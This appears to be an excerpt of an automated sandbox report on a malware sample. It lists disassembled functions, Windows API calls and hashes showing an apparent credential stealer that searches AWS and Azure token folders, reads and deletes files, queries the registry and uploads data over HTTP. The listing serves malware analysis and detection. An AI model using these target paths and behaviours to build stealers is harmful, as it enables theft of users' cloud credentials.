                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                                                  • API String ID: 4017274736-156832076
                                                                                  • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                                                  • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                                                  • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                                                  • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                                                  Function 0040CEF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                                                  • lstrcatA.KERNEL32(?,00000000,00906050,00421474,00906050,00421470,00000000), ref: 0040D208
                                                                                  • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                                                  • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                                                  • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                                                  • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                                                  • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                                                  • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                                                  • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D339
                                                                                  • memset.MSVCRT ref: 0040D388
                                                                                    • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                                                  • String ID:
                                                                                  • API String ID: 2775534915-0
                                                                                  • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                                                  • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                                                  • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                                                  • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                                                  Function 00B0D157 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0D1EA
                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B0D32E
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B0D335
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D46F
                                                                                  • lstrcat.KERNEL32(?,00421478), ref: 00B0D47E
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D491
                                                                                  • lstrcat.KERNEL32(?,0042147C), ref: 00B0D4A0
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D4B3
                                                                                  • lstrcat.KERNEL32(?,00421480), ref: 00B0D4C2
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D4D5
                                                                                  • lstrcat.KERNEL32(?,00421484), ref: 00B0D4E4
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D4F7
                                                                                  • lstrcat.KERNEL32(?,00421488), ref: 00B0D506
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D519
                                                                                  • lstrcat.KERNEL32(?,0042148C), ref: 00B0D528
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D53B
                                                                                  • lstrcat.KERNEL32(?,00421490), ref: 00B0D54A
                                                                                    • Part of subcall function 00B1AA87: lstrlen.KERNEL32(00B0516C,?,?,00B0516C,00420DDE), ref: 00B1AA92
                                                                                    • Part of subcall function 00B1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B1AAEC
                                                                                  • lstrlen.KERNEL32(?), ref: 00B0D591
                                                                                  • lstrlen.KERNEL32(?), ref: 00B0D5A0
                                                                                  • memset.MSVCRT ref: 00B0D5EF
                                                                                    • Part of subcall function 00B1ACD7: StrCmpCA.SHLWAPI(0064A350,00B0AA0E,?,00B0AA0E,0064A350), ref: 00B1ACF6
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B0D61B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                  • String ID:
                                                                                  • API String ID: 1973479514-0
                                                                                  • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                                                  • Instruction ID: e5a704b9eebe2d5f2a61b5db34aad3dcaf0886d24ea1de323d3e28fdd5fc7f06
                                                                                  • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                                                  • Instruction Fuzzy Hash: A4E15E75951108ABCB08FBE0DD96DEE77B9BF14701F904199F106A60A1EE34BF84CB62
                                                                                  Function 00B05BC7 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A51
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A68
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A7F
                                                                                    • Part of subcall function 00B04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04AA0
                                                                                    • Part of subcall function 00B04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04AB0
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B05C5F
                                                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B05C7A
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B05DFA
                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 00B060D8
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B060E9
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B060FA
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B06101
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B06116
                                                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00B0612D
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0613F
                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B06158
                                                                                  • memcpy.MSVCRT(?), ref: 00B06165
                                                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00B06182
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B06196
                                                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00B061B3
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B06217
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B06224
                                                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B05E5F
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B0622E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                                                  • String ID:
                                                                                  • API String ID: 1703137719-0
                                                                                  • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                                                  • Instruction ID: 5c767d1e7456cd812935d456f97c578ab7966f9901c20c10789cbe5c67d23fa1
                                                                                  • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                                                  • Instruction Fuzzy Hash: 5D12CC71961228ABCB15EBA0DD95FEEB7B9BF14700F9041D9B10A62091EF702BC8CF51
                                                                                  Function 00404880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                                                  • StrCmpCA.SHLWAPI(?,00906260), ref: 0040493A
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0090B9D0), ref: 00404DE8
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                                                  • HttpOpenRequestA.WININET(00000000,0090B870,?,0090B380,00000000,00000000,00400100,00000000), ref: 00404B15
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                  • String ID: "$"$------$------$------
                                                                                  • API String ID: 2402878923-2180234286
                                                                                  • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                                                  • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                                                  • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                                                  • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                                                                  Function 0040C990 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00909BD8,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                                                  • StrStrA.SHLWAPI(?,00909D28,00420B52), ref: 0040CAF7
                                                                                  • StrStrA.SHLWAPI(00000000,00909BF0), ref: 0040CB1E
                                                                                  • StrStrA.SHLWAPI(?,0090A290,00000000,?,00421458,00000000,?,00000000,00000000,?,00906100,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                                                  • StrStrA.SHLWAPI(00000000,0090A0D0), ref: 0040CCB9
                                                                                    • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                                                    • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00906020), ref: 0040C871
                                                                                    • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                                                    • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                                                  • StrStrA.SHLWAPI(?,0090A0D0,00000000,?,0042145C,00000000,?,00000000,00906020), ref: 0040CD5A
                                                                                  • StrStrA.SHLWAPI(00000000,009061E0), ref: 0040CD71
                                                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 3555725114-3916222277
                                                                                  • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                                                  • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                                                  • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                                                  • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                                                  Function 00B0CBF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 00B0CCD3
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00B0CCF0
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00B0CCFC
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B0CD0F
                                                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 00B0CD1C
                                                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B0CD40
                                                                                  • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 00B0CD5E
                                                                                  • StrStrA.SHLWAPI(00000000,0064A364), ref: 00B0CD85
                                                                                  • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 00B0CF09
                                                                                  • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 00B0CF20
                                                                                    • Part of subcall function 00B0CA87: memset.MSVCRT ref: 00B0CABA
                                                                                    • Part of subcall function 00B0CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B0CAD8
                                                                                    • Part of subcall function 00B0CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B0CAE3
                                                                                    • Part of subcall function 00B0CA87: memcpy.MSVCRT(?,?,?), ref: 00B0CB79
                                                                                  • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 00B0CFC1
                                                                                  • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 00B0CFD8
                                                                                    • Part of subcall function 00B0CA87: lstrcat.KERNEL32(?,00420B46), ref: 00B0CBAA
                                                                                    • Part of subcall function 00B0CA87: lstrcat.KERNEL32(?,00420B47), ref: 00B0CBBE
                                                                                    • Part of subcall function 00B0CA87: lstrcat.KERNEL32(?,00420B4E), ref: 00B0CBDF
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0D0AB
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B0D103
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 3555725114-3916222277
                                                                                  • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                                                  • Instruction ID: bc047a5ad41b23a2c803df24c9c9b2babd3bc55dbfe40530e94976e6c04d649f
                                                                                  • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                                                  • Instruction Fuzzy Hash: 35E1FF75911208ABCB14EBA4DD91EEEBBB9AF14700F404199F106B7191EF347AC9CF51
                                                                                  Function 00418320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00907C70,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                                                  • wsprintfA.USER32 ref: 00418459
                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                  • String ID: - $%s\%s$?
